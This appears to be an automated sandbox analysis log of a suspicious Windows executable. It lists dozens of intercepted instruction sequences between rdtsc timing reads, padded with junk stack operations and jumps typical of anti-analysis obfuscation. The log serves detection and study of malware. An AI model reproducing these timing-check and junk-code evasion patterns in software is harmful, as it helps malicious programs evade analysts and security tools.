Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950C69 second address: 7950CB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000001h 0x0000000a pushad 0x0000000b mov bl, ch 0x0000000d pushad 0x0000000e mov cl, dl 0x00000010 mov bh, al 0x00000012 popad 0x00000013 popad 0x00000014 push esi 0x00000015 jmp 00007F04A523AA92h 0x0000001a mov dword ptr [esp], eax 0x0000001d pushad 0x0000001e movzx eax, dx 0x00000021 mov cx, di 0x00000024 popad 0x00000025 lea eax, dword ptr [ebp-18h] 0x00000028 pushad 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c pop eax 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F04A523AA93h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950CB8 second address: 7950CD2 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push edx 0x00000009 pushad 0x0000000a mov edx, esi 0x0000000c mov si, C009h 0x00000010 popad 0x00000011 mov dword ptr [esp], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950CD2 second address: 7950CD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950CD6 second address: 7950CDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950CDA second address: 7950CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950D40 second address: 7950D5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F04A523FCC7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950D5B second address: 7950DF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebp-14h] 0x0000000e jmp 00007F04A523AA8Eh 0x00000013 mov ecx, esi 0x00000015 pushad 0x00000016 mov di, ax 0x00000019 popad 0x0000001a mov dword ptr [esi+0Ch], eax 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F04A523AA95h 0x00000024 and ah, 00000026h 0x00000027 jmp 00007F04A523AA91h 0x0000002c popfd 0x0000002d jmp 00007F04A523AA90h 0x00000032 popad 0x00000033 mov edx, 775606ECh 0x00000038 jmp 00007F04A523AA90h 0x0000003d sub eax, eax 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F04A523AA8Ch 0x00000046 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950DF7 second address: 7950DFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950DFD second address: 7950E13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lock cmpxchg dword ptr [edx], ecx 0x0000000c pushad 0x0000000d mov ebx, 29AF5FCAh 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950E13 second address: 7950E17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950E17 second address: 7950E1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950E1B second address: 7950E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edi 0x00000008 jmp 00007F04A523FCC3h 0x0000000d test eax, eax 0x0000000f jmp 00007F04A523FCC6h 0x00000014 jne 00007F0514DCE544h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F04A523FCC7h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950E6D second address: 7950EA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F04A523AA98h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950EA9 second address: 7950EAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950EAD second address: 7950EB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950EB3 second address: 7950EC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F04A523FCBDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950EC4 second address: 7950EC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950EC8 second address: 7950F5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi] 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F04A523FCBFh 0x00000011 sub eax, 2FCA5D4Eh 0x00000017 jmp 00007F04A523FCC9h 0x0000001c popfd 0x0000001d popad 0x0000001e mov dword ptr [edx], eax 0x00000020 jmp 00007F04A523FCBEh 0x00000025 mov eax, dword ptr [esi+04h] 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007F04A523FCBEh 0x0000002f sbb ecx, 03D81CF8h 0x00000035 jmp 00007F04A523FCBBh 0x0000003a popfd 0x0000003b jmp 00007F04A523FCC8h 0x00000040 popad 0x00000041 mov dword ptr [edx+04h], eax 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 pop edi 0x00000049 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 795102D second address: 7951033 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7951033 second address: 7951037 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7951037 second address: 79510C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+14h] 0x0000000b pushad 0x0000000c jmp 00007F04A523AA96h 0x00000011 pushfd 0x00000012 jmp 00007F04A523AA92h 0x00000017 sub ax, 8728h 0x0000001c jmp 00007F04A523AA8Bh 0x00000021 popfd 0x00000022 popad 0x00000023 mov dword ptr [edx+14h], eax 0x00000026 jmp 00007F04A523AA96h 0x0000002b mov eax, dword ptr [esi+18h] 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007F04A523AA8Eh 0x00000035 sbb eax, 600894B8h 0x0000003b jmp 00007F04A523AA8Bh 0x00000040 popfd 0x00000041 push eax 0x00000042 push edx 0x00000043 mov bx, ax 0x00000046 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79510C1 second address: 7951109 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F04A523FCC2h 0x00000008 jmp 00007F04A523FCC5h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 mov dword ptr [edx+18h], eax 0x00000014 jmp 00007F04A523FCBEh 0x00000019 mov eax, dword ptr [esi+1Ch] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7951109 second address: 795110F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 795110F second address: 795116C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+1Ch], eax 0x0000000c jmp 00007F04A523FCC0h 0x00000011 mov eax, dword ptr [esi+20h] 0x00000014 jmp 00007F04A523FCC0h 0x00000019 mov dword ptr [edx+20h], eax 0x0000001c jmp 00007F04A523FCC0h 0x00000021 mov eax, dword ptr [esi+24h] 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov eax, edx 0x00000029 mov cx, di 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 795116C second address: 7951268 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA92h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+24h], eax 0x0000000c pushad 0x0000000d call 00007F04A523AA8Eh 0x00000012 pushfd 0x00000013 jmp 00007F04A523AA92h 0x00000018 or esi, 4F265A28h 0x0000001e jmp 00007F04A523AA8Bh 0x00000023 popfd 0x00000024 pop ecx 0x00000025 call 00007F04A523AA99h 0x0000002a jmp 00007F04A523AA90h 0x0000002f pop eax 0x00000030 popad 0x00000031 mov eax, dword ptr [esi+28h] 0x00000034 jmp 00007F04A523AA91h 0x00000039 mov dword ptr [edx+28h], eax 0x0000003c pushad 0x0000003d pushfd 0x0000003e jmp 00007F04A523AA8Ch 0x00000043 add cl, 00000018h 0x00000046 jmp 00007F04A523AA8Bh 0x0000004b popfd 0x0000004c mov di, ax 0x0000004f popad 0x00000050 mov ecx, dword ptr [esi+2Ch] 0x00000053 jmp 00007F04A523AA92h 0x00000058 mov dword ptr [edx+2Ch], ecx 0x0000005b pushad 0x0000005c movzx eax, bx 0x0000005f jmp 00007F04A523AA93h 0x00000064 popad 0x00000065 mov ax, word ptr [esi+30h] 0x00000069 push eax 0x0000006a push edx 0x0000006b jmp 00007F04A523AA95h 0x00000070 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7951268 second address: 79512AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F04A523FCC7h 0x00000008 jmp 00007F04A523FCC8h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov word ptr [edx+30h], ax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F04A523FCBAh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79512AF second address: 79512BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79512BE second address: 79512E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [esi+32h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79512E5 second address: 79512E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79512E9 second address: 79512EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79512EF second address: 7951333 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA92h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [edx+32h], ax 0x0000000d pushad 0x0000000e mov edi, esi 0x00000010 jmp 00007F04A523AA8Ah 0x00000015 popad 0x00000016 mov eax, dword ptr [esi+34h] 0x00000019 jmp 00007F04A523AA90h 0x0000001e mov dword ptr [edx+34h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7951333 second address: 7951337 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7951337 second address: 795133D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 795133D second address: 7951369 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ecx, 00000700h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F04A523FCBAh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7951369 second address: 795136D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 795136D second address: 7951373 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7951373 second address: 7951379 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7951379 second address: 795137D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 795137D second address: 7951395 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F0514DC8E18h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov bx, F554h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7951395 second address: 79513A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F04A523FCBFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79513A8 second address: 795143F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or dword ptr [edx+38h], FFFFFFFFh 0x0000000c pushad 0x0000000d mov esi, ebx 0x0000000f pushfd 0x00000010 jmp 00007F04A523AA97h 0x00000015 xor ax, 094Eh 0x0000001a jmp 00007F04A523AA99h 0x0000001f popfd 0x00000020 popad 0x00000021 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000025 pushad 0x00000026 mov eax, 2D3163F3h 0x0000002b mov dh, ch 0x0000002d popad 0x0000002e or dword ptr [edx+40h], FFFFFFFFh 0x00000032 pushad 0x00000033 call 00007F04A523AA91h 0x00000038 pushfd 0x00000039 jmp 00007F04A523AA90h 0x0000003e and eax, 48F40028h 0x00000044 jmp 00007F04A523AA8Bh 0x00000049 popfd 0x0000004a pop esi 0x0000004b mov ax, bx 0x0000004e popad 0x0000004f pop esi 0x00000050 pushad 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 795143F second address: 795144E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov dh, al 0x0000000c push edi 0x0000000d pop ecx 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 795144E second address: 7951475 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA94h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F04A523AA8Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7951475 second address: 795147B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7990AD5 second address: 7990B0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F04A523AA96h 0x0000000f push eax 0x00000010 jmp 00007F04A523AA8Bh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7990B0E second address: 7990B12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7990B12 second address: 7990B16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7990B16 second address: 7990B1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7990B1C second address: 7990B43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, dx 0x00000006 call 00007F04A523AA95h 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7990B43 second address: 7990B5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7990B5B second address: 7990B6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F04A523AA8Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7990B6D second address: 7990B71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7990B71 second address: 7990B86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F04A523AA8Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79408C9 second address: 79408FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F04A523FCC8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79408FB second address: 7940901 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7940901 second address: 794092E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCBEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F04A523FCC0h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push edi 0x00000017 pop esi 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 78E0018 second address: 78E001F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 78E001F second address: 78E006B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F04A523FCBCh 0x00000008 pushfd 0x00000009 jmp 00007F04A523FCC2h 0x0000000e sub esi, 274F7CC8h 0x00000014 jmp 00007F04A523FCBBh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F04A523FCC0h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 78E006B second address: 78E006F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 78E006F second address: 78E0075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 78E0075 second address: 78E0086 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F04A523AA8Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 78E05FE second address: 78E0604 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 78E0604 second address: 78E0608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 78E0608 second address: 78E060C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 78E060C second address: 78E0656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F04A523AA94h 0x00000010 jmp 00007F04A523AA95h 0x00000015 popfd 0x00000016 movzx ecx, di 0x00000019 popad 0x0000001a push eax 0x0000001b jmp 00007F04A523AA8Ah 0x00000020 xchg eax, ebp 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 mov ebx, ecx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 78E0656 second address: 78E06BD instructions: 0x00000000 rdtsc 0x00000002 call 00007F04A523FCC8h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov esi, edx 0x0000000c popad 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F04A523FCC6h 0x00000018 sub si, 32E8h 0x0000001d jmp 00007F04A523FCBBh 0x00000022 popfd 0x00000023 call 00007F04A523FCC8h 0x00000028 pop ecx 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 78E06BD second address: 78E06D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 78E06D8 second address: 78E06DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 78E06DC second address: 78E06E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 78E0A7D second address: 78E0A8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F04A523FCBCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 78E0A8D second address: 78E0AF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d call 00007F04A523AA8Fh 0x00000012 pushfd 0x00000013 jmp 00007F04A523AA98h 0x00000018 sub eax, 78EFAE38h 0x0000001e jmp 00007F04A523AA8Bh 0x00000023 popfd 0x00000024 pop eax 0x00000025 push edx 0x00000026 movzx eax, bx 0x00000029 pop edx 0x0000002a popad 0x0000002b xchg eax, ebp 0x0000002c jmp 00007F04A523AA8Ch 0x00000031 mov ebp, esp 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 78E0AF6 second address: 78E0AFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 78E0AFA second address: 78E0B17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
